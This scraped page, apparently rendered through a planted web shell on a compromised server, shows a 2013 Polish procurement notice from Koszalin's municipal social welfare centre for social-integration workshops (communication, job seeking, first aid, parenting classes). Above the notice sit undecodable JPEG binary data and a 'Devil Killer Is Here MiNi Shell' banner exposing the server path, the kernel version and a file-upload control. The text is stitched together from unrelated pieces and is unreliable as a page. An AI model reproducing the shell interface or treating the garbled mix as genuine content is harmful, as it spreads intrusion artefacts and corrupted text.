JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130506/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130506/67133-N-2013.html

<p class="kh_header"><b>Koszalin: Realizacja ścieżki udziału uczestników projektu Koszaliński Program Integracji Społecznej- START, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, w zajęciach Klubu Integracji Społecznej w latach 2013 - 2014  - w 2013 roku.</b><br>
<b>Numer ogłoszenia: 67133 - 2013; data zamieszczenia: 06.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , Al. Monte Cassino 2, 75-412 Koszalin, woj. zachodniopomorskie, tel. 094 3160300, faks 0-94 3160328.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> mops.koszalin.ibip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja ścieżki udziału uczestników projektu Koszaliński Program Integracji Społecznej- START, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, w zajęciach Klubu Integracji Społecznej w latach 2013 - 2014  - w 2013 roku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Realizacja ścieżki udziału uczestników projektu Koszaliński Program Integracji Społecznej- START, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, w zajęciach Klubu Integracji Społecznej w latach 2013 - 2014  - w 2013 roku.
Zamówienie realizowane jest w częściach:
I część - 2013 rok obejmuje niniejsze postępowanie.
Przedmiotem zamówienia jest realizacja ścieżki udziału uczestników projektu Koszaliński Program Integracji Społecznej- START, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, w zajęciach Klubu Integracji Społecznej w latach 2013 - 2014  - w 2013 roku polegającej na organizacji i realizacji następujących Działań:
Działanie A - Trening komunikacji interpersonalnej (Gr. I)
Działanie B - Warsztaty wizażu i stylizacji (Gr. I)
Działanie C - Warsztaty aktywnego poszukiwania pracy (Gr. I)
Działanie D - Warsztaty rękodzieła artystycznego (Gr. I)
Działanie E - Kurs pierwszej pomocy przedmedycznej (Gr. I)
Działanie F 1 - Warsztaty Szkoła dla rodzica (Gr. II A, II B)
Działanie F 2 - Akademia Atrakcji - zajęcia warsztatowo - edukacyjne dla dzieci (w czasie warsztatów Szkoła dla rodzica)
Działanie G - Warsztaty aktywnego poszukiwania pracy Mama i tata idą do pracy (Gr. II A, II B)
Działanie H - Warsztaty wizażu i stylizacji (Gr. II A, II B)
Działanie I - Warsztaty kulinarne (Gr. II A, II B)
Działanie J - Kurs pierwszej pomocy przedmedycznej (Gr. II A, II B)
Działanie K - Warsztaty Aktywnego Poszukiwania Pracy i Autoprezentacji (Gr. III)
Działanie L - Kurs pierwszej pomocy przedmedycznej (Gr. III)
Działanie M - Warsztaty Podstawy obsługi komputera (Gr. III)
Działanie N - Trening komunikacji interpersonalnej (Gr. IV)
Działanie O - Warsztaty Aktywnego Poszukiwania Pracy i Autoprezentacji (Gr. IV)
Działanie P - Kurs pierwszej pomocy przedmedycznej (Gr. IV)
Działanie R - Warsztaty z  podstaw przedsiębiorczości (Gr. IV)
Uczestnicy projektu realizujący zajęcia w Klubie Integracji Społecznej zostali podzieleni
na 5 grup. Każda z grup będzie realizować odrębną ścieżkę udziału w zajęciach:
Grupa I - osoby niepełnosprawne - do 40 osób:
- osoby bezrobotne i lub nieaktywne zawodowo i lub zatrudnione, korzystające
ze świadczeń pomocy społecznej, w wieku aktywności zawodowej, posiadające orzeczenie o stopniu niepełnosprawności (lub równoważne); głównie osoby z zaburzeniami psychicznymi, osoby z zaburzeniami układu ruchu, osoby z zaburzeniami układu oddechowego i krążenia i inne.
Szczegółowy opis przedmiotu zamówienia poszczególnych Działań dla Grupy I (Działanie A, B ,C ,D ,E):
Działanie A - Trening komunikacji interpersonalnej
- 5 dni x 6 godz. X 3 podgrupy (średnio 13 osób w grupie, 40 osób łącznie) = łącznie 90 godz.
Cel: skuteczność komunikacji interpersonalnej (komunikacja werbalna i niewerbalna), integracja uczestników, nabycie praktycznych umiejętności załatwiania spraw urzędowych, wygląd zewnętrzny, czystość i higiena osobista.
Tematyka:
- wprowadzenie w zasady komunikacji interpersonalnej; 
- trening podstawowych reguł komunikacji interpersonalnej; 
- zapoznanie uczestników z zasadami skutecznego porozumiewania się, itp.; 
- kreowanie własnego wizerunku;
- spotkanie z zaproszoną osobą niepełnosprawną; 
- rola mowy ciała w komunikacji interpersonalnej; 
- bariery komunikacyjne, itp.;
- praktyczne zastosowanie zajęć z komunikacji werbalnej i niewerbalnej nastąpi w trakcie wspólnych (grupowych) wizyt - nabycie umiejętności załatwiania spraw urzędowych (1 wizyta dla każdej podgrupy w PUP Urzędzie Skarbowym ZUS) oraz zastosowanie komunikacji werbalnej (1 wyjście dla każdej podgrupy na przedstawienie otwarte w instytucji kultury na terenie Koszalina). Organizacja i przeprowadzenie po stronie Wykonawcy (koszty biletów, opieki nad grupą).

Działanie B - Warsztaty wizażu i stylizacji
- 4 dni x 6 godz. X 2 podgrupy (średnio 10 osób w grupie, 20 osób łącznie) = łącznie 48 godz.
Cel: podniesienie kompetencji życiowych i umiejętności społeczno - zawodowych umożliwiających docelowo powrót do życia społecznego, w tym powrót na rynek Pracy i aktywizację zawodową uczestników.
Tematyka:
- analiza kolorystyczna - indywidualny dobór kolorów, fryzury;
- zasady doboru garderoby (nabycie umiejętności skutecznego tuszowania mankamentów urody i podkreślenia atutów, dobór garderoby do miejsca pracy lub poszukiwanego zatrudnienia);
- zasady łączenia kolorów i dobierania dodatków do garderoby;
- psychologia koloru;
- dobór stroju, makijażu i fryzury na różne okazje, ze szczególnym uwzględnieniem pełnienia ról zawodowych i społecznych;
- techniki makijażu, dobór kosmetyków;
- Zadbany mężczyzna - elegancki mężczyzna - wskazówki dla panów;
- konsultacje odzieżowe - dobór garderoby na rozmowę kwalifikacyjną;
- analiza kształtu twarzy, wykonanie makijażu fryzury; 
- dokumentacja fotograficzna (profesjonalny fotograf).
Działanie C - Warsztaty aktywnego poszukiwania pracy 
- 3 dni x 5 godz. X 3 podgrupy (średnio  po 13 osób w grupie, 40 osób łącznie) = łącznie 45 godz.
Cel: przygotowanie do skuteczniejszego działania na rynku pracy, indywidualna analiza sytuacji zawodowych poszczególnych uczestników
Tematyka:
- omówienie aktualnej sytuacji na rynku pracy; 
- prawa i obowiązki pracowników, w tym prawa kobiet; 
- wymogi pracodawców wobec potencjalnych pracowników; 
- elastyczne formy zatrudnienia; 
- prowadzenie własnej działalności gospodarczej i źródła pozyskiwania dotacji;
- przygotowanie CV i listu motywacyjnego;
- rozmowa kwalifikacyjna (ćwiczenia praktyczne).
Działanie D - Warsztaty rękodzieła artystycznego 
- 10 dni x 6 godz. X 2 podgrupy (po 10 osób w grupie, 20 osób łącznie) = łącznie 120 godz. 
Cel: podniesienie kompetencji życiowych i umiejętności społeczno - zawodowych umożliwiających docelowo powrót do życia społecznego uczestników i powinny pełnić funkcję terapii zajęciowej - usprawniać uczestników fizycznie i psychicznie.
Tematyka:
- zapoznanie uczestników z różnymi dziedzinami rękodzieła artystycznego: filc, decoupage, rzeźba, ceramika, biżuteria, florystyka, scrapbooking, haft i koronka;
- zajęcia praktyczne w podgrupach zajmujących się daną dziedziną rękodzieła;
- wykonanie ozdób bożonarodzeniowych i prezentów świątecznych dla najbliższych.
Działanie E - Kurs pierwszej pomocy przedmedycznej
- 3 dni x 6 godz. X 3 podgrupy (średnio po 13 osób w grupie, 40 osób łącznie) = łącznie 54 godz.
Cel: nabycie elementarnej wiedzy oraz umiejętności prawidłowego postępowania 
i zachowania się podczas sytuacji zagrażającej bezpieczeństwu i życiu, nauczenie się właściwej i sprawnej reakcji w stanach zagrożenia życia oraz umiejętności opanowania uczucia strachu podczas udzielania pierwszej pomocy.
Tematyka:
- Aspekty prawne i etyczne, bezpieczeństwo, łańcuch przeżycia, wezwanie pomocy; podstawowe czynności ratujące życie;
- Podstawowe czynności ratujące życie, AED, pozycja boczna;
- Podstawowe czynności ratujące życie u dzieci;
- Pierwsza pomoc w różnych stanach zagrożenia życia i zdrowia (ból w klatce piersiowej, zadławienie, duszność);
- Pierwsza pomoc w różnych stanach zagrożenia życia i zdrowia (drgawki, zasłabnięcie, cukrzyca, udar);
- Pierwsza pomoc w różnych stanach zagrożenia życia i zdrowia (zatrucia, krwotok z nosa);
- Pierwsza pomoc (oparzenia, odmrożenia, porażenie prądem);
- Pierwsza pomoc w urazach (postępowanie, opatrunki).
Grupa II A - do 35 osób
Grupa II B - do 20 osób
- osoby będące wykluczone bądź zagrożone wykluczeniem społecznym głównie z powodu problemów  w sprawach opiekuńczo-wychowawczych, głównie rodziny niepełne lub wielodzietne, zagrożone pozbawieniem ograniczeniem praw rodzicielskich, rodzice biologiczni, których dzieci umieszczone zostały w pieczy zastępczej; w tym osoby bezrobotne i lub nieaktywne zawodowo i lub zatrudnione, korzystające ze świadczeń pomocy społecznej, w wieku aktywności zawodowej.
Szczegółowy opis przedmiotu zamówienia  poszczególnych Działań dla Grupy II A, II B
(Działanie F, G, H, I, J):
Działanie F - Warsztaty Szkoła dla rodzica
- 10 dni x 6 godz. X 3 podgrupy (średnio 11-12 osób w grupie, 35 osób łącznie) = łącznie 180 godz. -  gr. II A 
- 10 dni x 6 godz. X 2 podgrupy (średnio 10 osób w grupie, 20 osób łącznie) = łącznie 120 godz. - gr. II B
Cel: nabycie praktycznych umiejętności budowania prawidłowych relacji z dziećmi, podniesienie kompetencji społecznych w zakresie wychowywania dzieci, nabycie wiedzy na temat rozwoju dziecka, wzmocnienie siebie w roli rodzica.
Tematyka:
- Co zrobić, żeby dziecko zaczęło mnie słuchać?
- Granice. Konieczność stawiania zakazów i nakazów w procesie wychowawczym.
- Jak zachęcić dziecko do współpracy?
- Kara czy nagroda?
- Dowartościować dziecko - po co?
- Rola dziecka i rola rodzica.
- Jak budować prawidłowe relacje pomiędzy rodzeństwem?
- Jak pomóc dziecku, by radziło sobie z trudnymi uczuciami?
- Zazdrość pomiędzy rodzeństwem - jak sobie radzić i jak zapobiegać?
- Kłótnie, konflikty między rodzeństwem - jak sobie radzić i jak zapobiegać?
- Co zrobić, aby dziecko było samodzielne?
- Problemy wieku dorastania.
- Przemoc - jak radzić sobie z własnymi emocjami i uczuciami oraz uczuciami i emocjami dzieci?
 Akademia Atrakcji - zajęcia warsztatowo - edukacyjne dla dzieci
Akademia realizowana będzie dla dzieci w czasie warsztatów dla rodziców (Szkoły dla rodzica)
- 10 dni x 6 godz. X 3 podgrupy (średnio 15 dzieci w grupie, gr. 45 dzieci  łącznie) = łącznie 180 godz.  -  gr. II A 
- 10 dni x 6 godz. X 2 podgrupy (średnio gr. 15  dzieci w grupie, gr. 30 dzieci łącznie)
 = łącznie 120 godz.  - gr. II B
Cel: alternatywne formy spędzenia czasu wolnego, pobudzenie aktywności społecznej, edukacyjnej, kulturalnej itp.
Tematyka:
- Mini-warsztaty rękodzieła artystycznego (rysunek, rzeźba, scrapbooking).
- Mini-trening Komunikacji Interpersonalnej (komunikacja werbalna i niewerbalna, komunikacja z rodzicami i rodzeństwem).
- Zajęcia umuzykalniające (poznanie instrumentów muzycznych, nauka piosenek).
- Sport to zdrowie - zajęcia rozwijające ruchowo (poznanie różnych dyscyplin sportowych, zasady rywalizacji sportowej, rola ruchu w życiu człowieka).
- Filmoteka małego człowieka (wspólne oglądanie filmów bajek przeznaczonych dla dzieci, zabawy i konkursy filmowe).
- Jesteśmy Europejczykami (poznanie państw członkowskich Unii Europejskiej).
- Ekologia - czyli jak możemy chronić naszą planetę?
- Cudze chwalimy, swojego nie znamy - podróż po Polsce (gry, zabawy i konkursy krajoznawcze).
- Chcemy i umiemy pomagać - kurs pierwszej pomocy dla dzieci.
- Dzień Szarad - zagadki, rebusy i krzyżówki logiczne.
Działanie G - Warsztaty aktywnego poszukiwania pracy Mama i tata idą do pracy
- 3 dni x 5 godz. X 3 podgrupy (średnio 11-12 osób w grupie, 35 osób łącznie) = łącznie 45 godz. - gr. II A
- 3 dni x 5 godzin x 2 podgrupy (średnio 10 osób w grupie, 20 osób łącznie) = łącznie 30 godz.
- gr. II B
Cel: przygotowanie do skuteczniejszego działania na rynku pracy, indywidualna analiza sytuacji zawodowych poszczególnych uczestników
Tematyka:
- omówienie aktualnej sytuacji na rynku pracy; 
- prawa i obowiązki pracowników, w tym prawa kobiet; 
- wymogi pracodawców wobec potencjalnych pracowników; 
- elastyczne formy zatrudnienia; 
- prowadzenie własnej działalności gospodarczej i źródła pozyskiwania dotacji;
- łączenie roli rodzica z rolą pracownika;
- przygotowanie CV i listu motywacyjnego;
- rozmowa kwalifikacyjna (ćwiczenia praktyczne).
Działanie H - Warsztaty wizażu i stylizacji 
- 4 dni x 6 godz. X 3 podgrupy (średnio 11-12 osób w grupie, 35 osób łącznie) = łącznie 72 godz. - gr. II A
- 4 dni x 6 godz. X 2 podgrupy (średnio 10 osób w grupie, 20 osób łącznie) = łącznie 48 godz.
- gr. II B
Cel: podniesienie kompetencji życiowych i umiejętności społeczno - zawodowych umożliwiających docelowo powrót do życia społecznego, w tym powrót na rynek pracy i aktywizację zawodową uczestników.
Tematyka:
- analiza kolorystyczna - indywidualny dobór kolorów, fryzury;
- zasady doboru garderoby (nabycie umiejętności skutecznego tuszowania mankamentów urody i podkreślenia atutów, dobór garderoby do miejsca pracy lub poszukiwanego zatrudnienia);
- zasady łączenia kolorów i dobierania dodatków do garderoby;
- psychologia koloru;
- dobór stroju, makijażu i fryzury na różne okazje, ze szczególnym uwzględnieniem pełnienia ról zawodowych i społecznych;
- techniki makijażu, dobór kosmetyków;
- Zadbany mężczyzna - elegancki mężczyzna - wskazówki dla panów;
- konsultacje odzieżowe - dobór garderoby na rozmowę kwalifikacyjną;
- analiza kształtu twarzy, wykonanie makijażu fryzury;
- dokumentacja fotograficzna (profesjonalny fotograf).
Działanie I - Warsztaty kulinarne
- 4 dni x 5 godz. (max. 15 osób) = 20 godz. Gr. II A
- 4 dni x 5 godz. (max. 12 osób) = 20 godz. Gr. II B
Cel: podniesienie kompetencji życiowych i umiejętności społeczno - zawodowych umożliwiających docelowo powrót do życia społecznego uczestników. Zajęcia teoretyczne i praktyczne mają przygotować uczestników do świadomego podejścia do spraw związanych z żywieniem i nauczyć przyrządzania posiłków uwzględniając ograniczony budżet oraz zasady zdrowego żywienia, jako istotny element profilaktyki zdrowotnej.
Tematyka:
 - podstawowe zasady przygotowywania posiłków, stanowisko  racy, formy przetwarzania żywności;
- racjonalne żywienie. Składniki odżywcze i ich wpływ na zdrowie człowieka. Co warto jeść, czego należy unikać?;
- ekonomia w lodówce- jak kupować i nie marnować;
- zajęcia praktyczne połączone z degustacją. Nauka przygotowania następujących potraw:
zupy, dania obiadowe, desery, śniadania kolacje;
- przygotowanie uroczystości okolicznościowych (imprezy rodzinne, święta, urodziny, imieniny);
- dekorowanie stołów i potraw;
- przygotowanie przetworów na zimę.
Działanie J - Kurs pierwszej pomocy przedmedycznej 
- 3 dni x 6 godz. X 3 podgrupy (średnio 11 - 12 osób w grupie, 35 osób łącznie) = łącznie 54 godz. - gr. II A
- 3 dni x 6 godz. X 2 podgrupy (średnio 10 osób, 20 osób łącznie) = łącznie 36 godz.
- gr. II B
Cel: nabycie elementarnej wiedzy oraz umiejętności prawidłowego postępowania
i zachowania się podczas sytuacji zagrażającej bezpieczeństwu i życiu, nauczenie się właściwej i sprawnej reakcji w stanach zagrożenia życia oraz umiejętności opanowania uczucia strachu podczas udzielania pierwszej pomocy.
Tematyka:
- Aspekty prawne i etyczne, bezpieczeństwo, łańcuch przeżycia, wezwanie pomocy, podstawowe czynności ratujące życie;
- Podstawowe czynności ratujące życie, AED, pozycja boczna;
- Podstawowe czynności ratujące życie u dzieci;
- Pierwsza pomoc w różnych stanach zagrożenia życia i zdrowia (ból w klatce piersiowej, zadławienie, duszność);
- Pierwsza pomoc w różnych stanach zagrożenia życia i zdrowia (drgawki, zasłabnięcie, cukrzyca, udar);
- Pierwsza pomoc w różnych stanach zagrożenia życia i zdrowia (zatrucia, krwotok z nosa);
- Pierwsza pomoc (oparzenia, odmrożenia, porażenie prądem);
- Pierwsza pomoc w urazach (postępowanie, opatrunki).
Grupa III - do 10 osób, osoby zagrożone bezdomnością
- os. bezrobotne i lub os. nieaktywne zawodowo i lub os. zatrudnione zagrożone bezdomnością, korzystające ze świadczeń pomocy społecznej, w wieku aktywności zawodowej;
Szczegółowy opis przedmiotu zamówienia poszczególnych Działań dla Grupy III (Działanie K, L, M):
Działanie K - Warsztaty Aktywnego Poszukiwania Pracy i Autoprezentacji
- 4 dni x 5 godz. (10 osób) = 20 godz.
Cel: przygotowanie do skuteczniejszego działania na rynku pracy, indywidualna analiza sytuacji zawodowych poszczególnych uczestników.
Tematyka:
- omówienie aktualnej sytuacji na rynku pracy; 
- prawa i obowiązki pracowników, w tym prawa kobiet; 
- wymogi pracodawców wobec potencjalnych pracowników; 
- elastyczne formy zatrudnienia; 
- prowadzenie własnej działalności gospodarczej i źródła pozyskiwania dotacji;
- łączenie roli rodzica z rolą pracownika;
- przygotowanie CV i listu motywacyjnego;
- rozmowa kwalifikacyjna (ćwiczenia praktyczne);
- nauka sporządzania pism urzędowych;
- zasady doboru garderoby, nabycie umiejętności skutecznego tuszowania mankamentów urody i podkreślania atutów - dobór garderoby do miejsca pracy.

Działanie L - Kurs pierwszej pomocy przedmedycznej 
 - 3 dni x 6 godz. (10 osób) = 18 godz.
Cel: nabycie elementarnej wiedzy oraz umiejętności prawidłowego postępowania 
i zachowania się podczas sytuacji zagrażającej bezpieczeństwu i życiu, nauczenie się właściwej i sprawnej reakcji w stanach zagrożenia życia oraz umiejętności opanowania uczucia strachu podczas udzielania pierwszej pomocy.
Tematyka:
- Aspekty prawne i etyczne, bezpieczeństwo, łańcuch przeżycia, wezwanie pomocy, podstawowe czynności ratujące życie;
- Podstawowe czynności ratujące życie, AED, pozycja boczna;
- Podstawowe czynności ratujące życie u dzieci;
- Pierwsza pomoc w różnych stanach zagrożenia życia i zdrowia (ból w klatce piersiowej, zadławienie, duszność);
- Pierwsza pomoc w różnych stanach zagrożenia życia i zdrowia (drgawki, zasłabnięcie, cukrzyca, udar);
- Pierwsza pomoc w różnych stanach zagrożenia życia i zdrowia (zatrucia, krwotok z nosa);
- Pierwsza pomoc (oparzenia, odmrożenia, porażenie prądem);
- Pierwsza pomoc w urazach (postępowanie, opatrunki).
Działanie M - Warsztaty Podstawy obsługi komputera
- 5 dni x 6 godz. (10 osób) = 30 godz. 
Cel: nabycie umiejętności korzystania z nowych technologii komunikacyjno-informacyjnych (obsługa komputera, urządzeń biurowych, korzystanie z Internetu).
Tematyka: 
- podstawy obsługi komputera (włączanie i wyłączanie komputera, posługiwanie się klawiaturą, myszką i drukarką) 
- podstawy korzystania z Internetu 
- praca z edytorem tekstu Microsoft Word 
- praca z Microsoft Excel.
Grupa IV - do 35 osób
- os. bezrobotne i lub os. nieaktywne zawodowo i lub os. zatrudnione, które cechuje brak lub nieadekwatność kwalifikacji do potrzeb rynku pracy, korzystające ze świadczeń pomocy społecznej, w wieku aktywności zawodowej;
Szczegółowy opis przedmiotu zamówienia  poszczególnych Działań dla Grupy IV 
(Działanie N, O, P, R):
Działanie N - Trening komunikacji interpersonalnej
5 dni x 6 godzin x 3 podgrupy (średnio 11-12 osób w grupie, 35 osób łącznie) = łącznie 90 godz.
Cel: skuteczność komunikacji interpersonalnej, integracja uczestników, nabycie praktycznych umiejętności załatwiania spraw urzędowych, wygląd zewnętrzny, czystość i higiena osobista.
Tematyka:
- wprowadzenie w zasady komunikacji interpersonalnej; 
- trening podstawowych reguł komunikacji interpersonalnej; 
- zapoznanie uczestników z zasadami skutecznego porozumiewania się;
- kreowanie własnego wizerunku;
- rola mowy ciała w komunikacji interpersonalnej;
- bariery komunikacyjne;
- praktyczne zastosowanie komunikacji interpersonalnej (wyjście do instytucji kultury na przedstawienie otwarte).
Działanie O - Warsztaty Aktywnego Poszukiwania Pracy i Autoprezentacji 
4 dni x 5 godz. X 3 podgrupy (średnio 11 - 12 osób w grupie, łącznie 35 osób) = łącznie 60 godz. 
Cel: przygotowanie do skuteczniejszego działania na rynku pracy, indywidualna analiza sytuacji zawodowych poszczególnych uczestników
Tematyka:
- omówienie aktualnej sytuacji na rynku pracy; 
- prawa i obowiązki pracowników, w tym prawa kobiet; 
- wymogi pracodawców wobec potencjalnych pracowników; 
- elastyczne formy zatrudnienia; 
- dyskryminacja i mobbing;
- prowadzenie własnej działalności gospodarczej i źródła pozyskiwania dotacji;
- łączenie roli rodzica z rolą pracownika;
- przygotowanie CV i listu motywacyjnego;
- rozmowa kwalifikacyjna (ćwiczenia praktyczne);
- nauka sporządzania pism urzędowych;
- zasady doboru garderoby, nabycie umiejętności skutecznego tuszowania mankamentów urody i podkreślania atutów - dobór garderoby do miejsca pracy.
Działanie P - Kurs pierwszej pomocy przedmedycznej
3 dni x 6 godzin x 3 podgrupy (średnio 11 - 12 osób w grupie, łącznie 35 osób) = łącznie 54 godz.
Cel: nabycie elementarnej wiedzy oraz umiejętności prawidłowego postępowania 
i zachowania się podczas sytuacji zagrażającej bezpieczeństwu i życiu, nauczenie się właściwej i sprawnej reakcji w stanach zagrożenia życia oraz umiejętności opanowania uczucia strachu podczas udzielania pierwszej pomocy.
Tematyka:
- Aspekty prawne i etyczne, bezpieczeństwo, łańcuch przeżycia, wezwanie pomocy, podstawowe czynności ratujące życie;
- Podstawowe czynności ratujące życie, AED, pozycja boczna;
- Podstawowe czynności ratujące życie u dzieci;
- Pierwsza pomoc w różnych stanach zagrożenia życia i zdrowia (ból w klatce piersiowej, zadławienie, duszność);
- Pierwsza pomoc w różnych stanach zagrożenia życia i zdrowia (drgawki, zasłabnięcie, cukrzyca, udar);
- Pierwsza pomoc w różnych stanach zagrożenia życia i zdrowia (zatrucia, krwotok z nosa);
- Pierwsza pomoc (oparzenia, odmrożenia, porażenie prądem);
- Pierwsza pomoc w urazach (postępowanie, opatrunki).
Działanie R - Warsztaty z  podstaw przedsiębiorczości
5 dni x 6 godz. X 3 podgrupy (średnio 11 - 12 osób w grupie, 35 osób łącznie) = łącznie 90 godz.
1 dzień x 10 godz. X 1 grupa (max. 35 osób) = łącznie 10 godz. 
Cel: podniesienie kompetencji życiowych i umiejętności społeczno - zawodowych umożliwiających docelowo powrót do życia społecznego, w tym powrót na rynek Pracy i aktywizację zawodową uczestników.
Tematyka:
- Zakładanie działalności gospodarczej - krok po kroku;
- Podstawowe pojęcia związane z działalnością gospodarczą;
- Tworzenie biznesplanu;
- Formy prowadzenia działalności gospodarczej;
- Prawne podstawy zakładania i prowadzenia działalności gospodarczej;
- 1 - dniowy wyjazd do podmiotu ekonomii społecznej (max. 35 osób) - czas trwania wyjazdu: max. 10 godz. Zegarowych z przejazdem..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających do 50% wartości zamówienia podstawowego, polegających na powtórzeniu tych samych zajęć w przypadku, jeżeli zamówiona ilość okaże się niewystarczająca.</li></ul>

